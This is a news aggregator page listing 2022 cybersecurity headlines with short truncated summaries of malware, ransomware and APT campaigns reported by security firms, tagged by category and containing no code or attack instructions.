What's new arround internet
| Src | Date (GMT) | Titre | Description | Tags | Stories | Notes |
 |
2022-08-21 23:56:05 | Fake DDoS protection pages on compromised WordPress sites lead to malware infections (lien direct) | >Threat actors compromise WordPress sites to display fake Cloudflare DDoS protection pages to distribute malware. DDoS Protection pages are associated with browser checks performed by WAF/CDN services which verify if the site visitor is a human or a bot. Recently security experts from Sucuri, spotted JavaScript injections targeting WordPress sites to display fake DDoS Protection pages […] | Malware | ||
|
2022-08-21 08:35:30 | Grandoreiro banking malware targets Mexico and Spain (lien direct) | >A new Grandoreiro banking malware campaign is targeting organizations in Mexico and Spain, Zscaler reported. Zscaler ThreatLabz researchers observed a Grandoreiro banking malware campaign targeting organizations in the Spanish-speaking nations of Mexico and Spain. Grandoreiro is a modular backdoor that supports the following capabilities: Keylogging Auto-Updation for newer versions and modules Web-Injects and restricting access to specific […] | Malware | ||
|
2022-08-20 08:28:30 | TA558 cybercrime group targets hospitality and travel orgs (lien direct) | >TA558 cybercrime group is behind a malware campaign targeting hospitality, hotel, and travel organizations in Latin America Researchers from Proofpoint are monitoring a malware campaign conducted by a cybercrime group, tracked as TA558, that is targeting hospitality, hotel, and travel organizations in Latin America. The group is a small crime threat actor, that has been […] | Malware Threat | ||
|
2022-08-19 09:04:18 | Cisco fixes High-Severity bug in Secure Web Appliance (lien direct) | >Cisco addressed a high-severity escalation of privilege vulnerability (CVE-2022-20871) in AsyncOS for Cisco Secure Web Appliance. Cisco Secure Web Appliance (formerly Secure Web Appliance (WSA)) offers protection from malware and web-based attacks and provides application visibility and control. Cisco has addressed a high-severity escalation of privilege vulnerability, tracked as CVE-2022-20871, that resides in the web management interface of AsyncOS for Cisco Secure Web […] | Malware Vulnerability | ||
|
2022-08-17 08:31:52 | North Korea-linked APT targets Job Seekers with macOS malware (lien direct) | >The North Korea-linked Lazarus Group has been observed targeting job seekers with macOS malware working also on Intel and M1 chipsets. ESET researchers continue to monitor a cyberespionage campaign, tracked as “Operation In(ter)ception,” that has been active at least since June 2020. The campaign targets employees working in the aerospace and military sectors and leverages […] | Malware Medical | APT 38 | |
|
2022-08-16 08:15:55 | Russia-linked Gamaredon APT continues to target Ukraine (lien direct) | >Russia-linked Gamaredon APT group targets Ukrainian entities with PowerShell info-stealer malware dubbed GammaLoad. Russia-linked Gamaredon APT group (aka Shuckworm, Actinium, Armageddon, Primitive Bear, and Trident Ursa) targets Ukrainian entities with PowerShell info-stealer malware dubbed GammaLoad, Symantec warns. The Computer Emergency Response Team of Ukraine (CERT-UA) confirmed the ongoing cyber espionage campaign. Symantec and TrendMicro first discovered the Gamaredon […] | Malware | ||
|
2022-08-15 15:22:28 | SOVA Android malware now also encrypts victims\' files (lien direct) | Security researchers from Cleafy reported that the SOVA Android banking malware is back and is rapidly evolving. The SOVA Android banking trojan was improved, it has a new ransomware feature that encrypts files on Android devices, Cleafy researchers report. The malware has been active since 2021 and evolves over time. The latest version of the […] | Ransomware Malware | ||
|
2022-08-15 08:16:31 | A new PyPI Package was found delivering fileless Linux Malware (lien direct) | >Security Researchers discovered a new PyPI Package designed to drop fileless cryptominer to Linux systems. Sonatype researchers have discovered a new PyPI package named ‘secretslib‘ that drops fileless cryptominer to the memory of Linux machine systems. The package describes itself as “secrets matching and verification made easy,” it has a total of 93 downloads since […] | Malware | ||
|
2022-08-06 20:46:41 | Greek intelligence service used surveillance malware to spy on a journalist, Reuters reports (lien direct) | >Greek intelligence admitted it had spied on a journalist, while citizens ask the government to reveal the use of surveillance malware. The head of the Greek intelligence told a parliamentary committee that they had spied on a journalist with surveillance malware, Reuters reported citing two sources present. The revelation comes while media and journalists are […] | Malware | ||
|
2022-08-04 19:13:13 | New Woody RAT used in attacks aimed at Russian entities (lien direct) | >An unknown threat actor is targeting Russian organizations with a new remote access trojan called Woody RAT. Malwarebytes researchers observed an unknown threat actor targeting Russian organizations with a new remote access trojan called Woody RAT. The attackers were delivering the malware using archive files and Microsoft Office documents exploiting the Follina Windows flaw (CVE-2022-30190). The assumption […] | Malware Threat | ||
|
2022-08-02 07:44:54 | Gootkit AaaS malware is still active and uses updated tactics (lien direct) | >Gootkit access-as-a-service (AaaS) malware is back with tactics and fileless delivery of Cobalt Strike beacons. Gootkit runs on an access-a-as-a-service model, it is used by different groups to drop additional malicious payloads on the compromised systems. Gootkit has been known to use fileless techniques to deliver threats such as the SunCrypt, and REvil (Sodinokibi) ransomware, Kronos trojans, […] | Malware | ★★ | |
|
2022-07-29 13:55:57 | Microsoft experts linked the Raspberry Robin malware to Evil Corp operation (lien direct) | >Microsoft linked the recently discovered Raspberry Robin Windows malware to the notorious Evil Corp operation. On July 26, 2022, Microsoft researchers discovered that the FakeUpdates malware was being distributed via Raspberry Robin malware. Raspberry Robin is a Windows worm discovered by cybersecurity researchers from Red Canary, the malware propagates through removable USB devices. The malicious code […] | Malware | ||
|
2022-07-29 08:06:44 | (Déjà vu) Malware-laced npm packages used to target Discord users (lien direct) | >Threat actors used multiple npm packages to target Discord users with malware designed to steal their payment card data. A malicious campaign targeting Discord users leverages multiple npm packages to deliver malware that steals their payment card information, Kaspersky researchers warn. The malicious code hidden in the packages, and tracked as Lofy Stealer, is a […] | Malware | ||
|
2022-07-28 11:04:36 | European firm DSIRF behind the attacks with Subzero surveillance malware (lien direct) | >Microsoft linked a private-sector offensive actor (PSOA) to attacks using multiple zero-day exploits for its Subzero malware. The Microsoft Threat Intelligence Center (MSTIC) and the Microsoft Security Response Center (MSRC) researchers linked a threat group known as Knotweed to an Austrian surveillance firm named DSIRF, known for using multiple Windows and Adobe zero-day exploits. The […] | Malware Threat | ||
|
2022-07-26 16:14:12 | Threat actors leverages DLL-SideLoading to spread Qakbot malware (lien direct) | >Qakbot malware operators are using the Windows Calculator to side-load the malicious payload on target systems. Security expert ProxyLife and Cyble researchers recently uncovered a Qakbot campaign that was leveraging the Windows 7 Calculator app for DLL side-loading attacks. Dynamic-link library (DLL) side-loading is an attack method that takes advantage of how Microsoft Windows applications handle DLL […] | Malware | ||
|
2022-07-25 23:10:18 | CosmicStrand, a new sophisticated UEFI firmware rootkit linked to China (lien direct) | >Kaspersky uncovered a new UEFI firmware rootkit, tracked as CosmicStrand, which it attributes to an unknown Chinese-speaking threat actor. Researchers from Kaspersky have spotted a UEFI firmware rootkit, named CosmicStrand, which has been attributed to an unknown Chinese-speaking threat actor. This malware was first spotted by Chinese firm Qihoo360 in 2017. The researchers were not […] | Malware Threat | ||
|
2022-07-25 06:27:21 | Amadey malware spreads via software cracks laced with SmokeLoader (lien direct) | >Operators behind the Amadey Bot malware use the SmokeLoader to distribute a new variant via software cracks and keygen sites. Amadey Bot is a data-stealing malware that was first spotted in 2018, it also allows operators to install additional payloads. The malware is available for sale in illegal forums, in the past, it was used […] | Malware | ||
|
2022-07-22 05:45:39 | (Déjà vu) TA4563 group leverages EvilNum malware to target European financial and investment entities (lien direct) | >A threat actor tracked as TA4563 is using EvilNum malware to target European financial and investment entities. A threat actor, tracked as TA4563, leverages the EvilNum malware to target European financial and investment entities, Proofpoint reported. The group focuses on entities with operations supporting foreign exchanges, cryptocurrency, and decentralized finance (DeFi). The EvilNum is a […] | Malware Threat | ||
|
2022-07-21 20:20:16 | Threat actors target software firm in Ukraine using GoMet backdoor (lien direct) | >Threat actors targeted a large software development company in Ukraine using the GoMet backdoor. Researchers from Cisco Talos discovered an uncommon piece of malware that was employed in an attack against a large Ukrainian software development company. The software development company produces software that is used by various state organizations in Ukraine. Researchers believe that […] | Malware | ||
|
2022-07-21 17:37:51 | Lightning Framework, a previously undetected malware that targets Linux systems (lien direct) | >Researchers discovered a previously undetected malware dubbed ‘Lightning Framework’ that targets Linux systems. Researchers from Intezer discovered a previously undetected malware, tracked as Lightning Framework, which targets Linux systems. The malicious code has a modular structure and is able to install rootkits. “Lightning Framework is a new undetected Swiss Army Knife-like Linux malware that has […] | Malware | ||
|
2022-07-19 20:07:23 | CloudMensis spyware went undetected for many years (lien direct) | >Researchers spotted previously undocumented spyware, dubbed CloudMensis, that targets the Apple macOS systems. Researchers from ESET discovered a previously undetected macOS backdoor, tracked as CloudMensis, that targets macOS systems and exclusively uses public cloud storage services as C2. The malware was designed to spy on the target systems, exfiltrate documents, acquire keystrokes, and screen captures. […] | Malware | ||
|
2022-07-19 08:44:47 | Several apps on the Play Store used to spread Joker, Facestealer and Coper malware (lien direct) | >Google blocked dozens of malicious apps from the official Play Store that were spreading Joker, Facestealer, and Coper malware families. Google has removed dozens of malicious apps from the official Play Store that were distributing Joker, Facestealer, and Coper malware families. Researchers from security firms Pradeo discovered multiple apps spreading the Joker Android malware. The […] | Malware | ||
|
2022-07-13 18:29:04 | Qakbot operations continue to evolve to avoid detection (lien direct) | >Experts warn that operators behind the Qakbot malware operation are improving their attack chain in an attempt to avoid detection. Qakbot, also known as QBot, QuackBot and Pinkslipbot, is an info-stealing malware that has been active since 2008. The malware spreads via malspam campaigns, it inserts replies in active email threads. The threat continues to […] | Malware Threat | ||
|
2022-07-09 10:04:58 | Ongoing Raspberry Robin campaign leverages compromised QNAP devices (lien direct) | >Cybereason researchers are warning of a wave of attacks spreading the wormable Windows malware Raspberry Robin. Raspberry Robin is a Windows worm discovered by cybersecurity researchers from Red Canary, the malware propagates through removable USB devices. The malicious code uses Windows Installer to reach out to QNAP-associated domains and download a malicious DLL. The malware uses […] | Malware | ||
|
2022-07-08 10:25:18 | Russian Cybercrime Trickbot Group is systematically attacking Ukraine (lien direct) | >The operators behind the TrickBot malware are systematically targeting Ukraine since the beginning of the war in February 2022. IBM researchers collected evidence indicating that the Russia-based cybercriminal Trickbot group (aka Wizard Spider, DEV-0193, ITG23) has been systematically attacking Ukraine since the beginning of the Russian invasion of the country. Since February, the Conti ransomware […] | Ransomware Malware | ||
|
2022-07-07 09:34:15 | OrBit, a new sophisticated Linux malware still undetected (lien direct) | >Cybersecurity researchers warn of new malware, tracked as OrBit, which is a fully undetected Linux threat. Cybersecurity researchers at Intezer have uncovered a new Linux malware, tracked as OrBit, that is still undetected. The malware can be installed as a volatile implant either by achieving persistence on the compromised systems. The malware implements advanced evasion […] | Malware | ||
|
2022-07-06 09:38:38 | New Hive ransomware variant is written in Rust and use improved encryption method (lien direct) | >Hive ransomware operators have improved their file-encrypting module by migrating to Rust language and adopting a more sophisticated encryption method. The operators of the Hive ransomware upgraded their malware by migrating the malware to the Rust language and implementing a more sophisticated encryption method, Microsoft researchers warn. “The upgrades in the latest variant are effectively […] | Ransomware Malware | ||
|
2022-07-05 07:44:27 | AstraLocker ransomware operators shut down their operations (lien direct) | >AstraLocker ransomware operators told BleepingComputer they’re shutting down their operations and are releasing decryptors. AstraLocker ransomware operators told BleepingComputer they’re shutting down the operation and provided decryptors to the VirusTotal malware analysis platform. AstraLocker is based on the source code of the Babuk Locker (Babyk) ransomware that was leaked online on June 2021. BleepingComputer tested the […] | Ransomware Malware | ||
|
2022-07-03 17:32:54 | Microsoft: Raspberry Robin worm already infected hundreds of networks (lien direct) | >Microsoft announced that the Windows worm Raspberry Robin has already infected the networks of hundreds of organizations. Raspberry Robin is a Windows worm discovered by cybersecurity researchers from Red Canary, the malware propagates through removable USB devices. The malicious code uses Windows Installer to reach out to QNAP-associated domains and download a malicious DLL. The […] | Malware | ||
|
2022-06-30 06:36:46 | YTStealer info-stealing malware targets YouTube content creators (lien direct) | >Researchers detailed a new information-stealing malware, dubbed YTStealer, that targets YouTube content creators. Intezer cybersecurity researchers have detailed a new information-stealing malware, dubbed YTStealer, that was developed to steal authentication cookies from YouTube content creators. The malware is highly likely available as a service on the Dark Web. Upon executing the malware, it performs some environment […] | Malware | ||
|
2022-06-28 21:24:18 | ZuoRAT malware hijacks SOHO Routers to spy in the vitims (lien direct) | >A new RAT dubbed ZuoRAT was employed in a campaign aimed at small office/home office (SOHO) routers in North American and Europe. Researchers from Black Lotus Labs, the threat intelligence division of Lumen Technologies, have discovered a new remote access trojan (RAT) called ZuoRAT, which targets small office/home office (SOHO) devices of remote workers during COVID-19 […] | Malware Threat | ||
|
2022-06-27 14:46:33 | New Matanbuchus Campaign drops Cobalt Strike beacons (lien direct) | >Matanbuchus malware-as-a-service (Maas) has been observed spreading through phishing campaigns, dropping Cobalt Strike beacons. Threat intelligence firm Cyble has observed a malware-as-a-service (Maas), named Matanbuchus, involved in malspam attacks dropping Cobalt Strike beacons. Matanbuchus is a malware loader that first appeared on the threat landscape in February 2021, when it was offered for rent on Russian-speaking […] | Malware Threat | ||
|
2022-06-27 10:23:24 | Ukrainian telecommunications operators hit by DarkCrystal RAT malware (lien direct) | >The Ukrainian CERT-UA warns of attacks against Ukrainian telecommunications operators involving the DarkCrystal RAT. The Governmental Computer Emergency Response Team of Ukraine (CERT-UA) is warning of a malware campaign targeting Ukrainian telecommunications operators with the DarkCrystal RAT. The malspam messages have the topic “Free primary legal aid” use a password-protected attachment “Algorithm of actions of […] | Malware | ||
|
2022-06-23 18:40:55 | Chinese Tropic Trooper APT spreads a hacking tool laced with a backdoor (lien direct) | >China-linked APT group Tropic Trooper has been spotted previously undocumented malware written in Nim language. Check Point Research uncovered an activity cluster with ties to China-linked APT Tropic Trooper (aka Earth Centaur, KeyBoy, and Pirate Panda) which involved the use of a previously undescribed loader (dubbed “Nimbda”) written in Nim language. The Tropic Trooper APT has been active at least […] | Malware Tool | APT 23 | |
|
2022-06-20 09:41:01 | BRATA Android Malware evolves and targets the UK, Spain, and Italy (lien direct) | >The developers behind the BRATA Android malware have implemented additional features to avoid detection. The operators behind the BRATA Android malware have implemented more features to make their attacks stealthy. The malware was first spotted in 2019 by security experts at Kaspersky, the name BRAT comes from 'Brazilian RAT Android,' because at the time it was used to […] | Malware | ||
|
2022-06-18 06:47:02 | MaliBot Android Banking Trojan targets Spain and Italy (lien direct) | >Malibot is a new Android malware targeting online banking and cryptocurrency wallet customers in Spain and Italy. F5 Labs researchers spotted a new strain of Android malware, named Malibot, that is targeting online banking and cryptocurrency wallet customers in Spain and Italy. The experts documented attacks against multiple banks, including UniCredit, Santander, CaixaBank, and CartaBCC. […] | Malware | ||
|
2022-06-17 20:00:33 | Experts link Hermit spyware to Italian surveillance firm RCS Lab and a front company (lien direct) | >Experts uncovered an enterprise-grade surveillance malware dubbed Hermit used to target individuals in Kazakhstan, Syria, and Italy since 2019. Lookout Threat Lab researchers uncovered enterprise-grade Android surveillance spyware, named Hermit, used by the government of Kazakhstan to track individuals within the country. The latest samples of this spyware were detected by the researchers in April 2022, four […] | Malware Threat Cloud | APT 37 | |
|
2022-06-16 07:00:36 | Malicious apps continue to spread through the Google Play Store (lien direct) | >Researchers at antivirus firm Dr. Web discovered malware in the Google Play Store that was downloaded two million times. An investigation conducted by the antivirus firm Dr. Web in May resulted in the discovery of multiple adware and information-stealing malware on the official Google Play Store. However, the experts warn that info-stealing Trojans are the […] | Malware | ||
|
2022-06-14 07:06:29 | SeaFlower campaign distributes backdoored versions of Web3 wallets to steal seed phrases (lien direct) | >Chinese cybercriminals are using SeaFlower backdoored versions of iOS and Android Web3 wallets to steal users' seed phrase. Researchers from Confiant have uncovered a sophisticated malware campaign, tracked as SeaFlower, targeting Web3 wallet users. Chinese crooks are spreading backdoored versions of iOS and Android Web3 wallets to steal users' seed phrase. SeaFlower maintains the functionality […] | Malware | ||
|
2022-06-10 14:37:16 | Experts spotted a new variant of the Cuba Ransomware with optimized infection techniques (lien direct) | >The Cuba ransomware operators are back and employed a new version of its malware in recent attacks. Cuba ransomware has been active since at least January 2020. Its operators have a data leak site, where they post exfiltrated data from their victims who refused to pay the ransom. The ransomware encrypts files on the targeted systems […] | Ransomware Malware | ||
|
2022-06-09 08:48:41 | Tainted CCleaner Pro Cracker spreads via Black Seo campaign (lien direct) | >Threat actors spread info-stealing malware through the search results for a pirated copy of the CCleaner Pro Windows optimization program. Researchers from Avast have uncovered a malware campaign, tracked as FakeCrack, spreading through the search results for a pirated copy of the CCleaner Pro Windows optimization program. The researchers pointed out that operators behind the campaign […] | Malware | CCleaner CCleaner | ★★★ |
|
2022-06-07 08:55:47 | Black Basta ransomware operators leverage QBot for lateral movements (lien direct) | >The QBot malware operation has partnered with Black Basta ransomware group to target organizations worldwide. Researchers from NCC Group spotted a new partnership in the threat landscape between the Black Basta ransomware group and the QBot malware operation. Black Basta has been active since April 2022, like other ransomware operations, it implements a double-extortion attack […] | Ransomware Malware Threat | ||
|
2022-06-03 23:46:21 | LuoYu APT delivers WinDealer malware via man-on-the-side attacks (lien direct) | >Chinese LuoYu Hackers Using Man-on-the-Side Attacks to Deploy WinDealer Backdoor An “extremely sophisticated” China-linked APT tracked as LuoYu was delivering malware called WinDealer via man-on-the-side attacks. Researchers from Kaspersky have uncovered an “extremely sophisticated” China-linked APT group, tracked as LuoYu, that has been observed using a malicious Windows tool called WinDealer. LuoYu has been active since at […] | Malware Tool | ||
|
2022-05-30 07:09:17 | EnemyBot malware adds new exploits to target CMS servers and Android devices (lien direct) | >The operators of the EnemyBot botnet added exploits for recently disclosed flaws in VMware, F5 BIG-IP, and Android systems. Operators behind the EnemyBot botnet are expanding the list of potential targets adding exploits for recently disclosed critical vulnerabilities in from VMware, F5 BIG-IP, and Android. The botnet was first discovered by Fortinet in March, the […] | Malware | ★★★★★ | |
|
2022-05-28 15:55:27 | Experts believe that Russian Gamaredon APT could fuel a new round of DDoS attacks (lien direct) | >360 Qihoo reported DDoS attacks launched by APT-C-53 (aka Gamaredon) conducted through the open-source DDoS Trojan program LOIC. Researchers at 360 Qihoo observed a wave of DDoS attacks launched by Russia-linked APT-C-53 (aka Gamaredon) and reported that the threat actors also released as open-source the code of a DDoS Trojan called LOIC. The instances of the malware spotted by the experts […] | Malware Threat | ||
|
2022-05-28 15:02:13 | The strange link between Industrial Spy and the Cuba ransomware operation (lien direct) | >The recently launched Industrial Spy data extortion marketplace has now started its ransomware operation. In April, Malware HunterTeam and Bleeping Computer reported the launch of a new dark web marketplace called Industrial Spy that sells stolen data and offers free stolen data to its members. MalwareHunterTeam researchers spotted malware samples [1, 2] that drop the following wallpaper that promotes […] | Ransomware Malware | ||
|
2022-05-26 14:38:43 | Experts warn of a new malvertising campaign spreading the ChromeLoader (lien direct) | >Researchers warn of a new malvertising campaign spreading the ChromeLoader malware that hijacks the victims’ browsers. Researchers from Red Canary observed a new malvertising campaign spreading the ChromeLoader malware that hijacks the victims’ browsers. ChromeLoader is a malicious Chrome browser extension, it is classified as a pervasive browser hijacker that modifies browser settings to redirect […] | Malware | ||
|
2022-05-24 09:06:15 | Nation-state malware could become a commodity on dark web soon, Interpol warns (lien direct) | >Interpol Secretary warns that nation-state malware will become available on the cybercrime underground in a couple of years. Interpol Secretary General Jurgen Stock declared that nation-state malwre will become available on the darknet in a couple of years. In the ongoing conflict between Russia and Ukraine, the malware developed by both nation-state actors and non […] | Malware | ||
|
2022-05-23 06:56:23 | Threat actors target the infoSec community with fake PoC exploits (lien direct) | >Researchers uncovered a malware campaign targeting the infoSec community with fake Proof Of Concept to deliver a Cobalt Strike beacon. Researchers from threat intelligence firm Cyble uncovered a malware campaign targeting the infoSec community. The expert discovered a post where a researcher were sharing a fake Proof of Concept (POC) exploit code for an RPC Runtime Library […] | Malware Threat | ||
|
2022-05-18 14:37:54 | Microsoft warns of the rise of cryware targeting hot wallets (lien direct) | >Microsoft researchers warn of the rising threat of cryware targeting non-custodial cryptocurrency wallets, also known as hot wallets. Microsoft warns of the rise of cryware, malicious software used to steal info an dfunds from non-custodial cryptocurrency wallets, also known as hot wallets. Data stolen from this kind of malware includes private keys, seed phrases, and […] | Malware Threat |
To see everything:
Our RSS (filtrered)
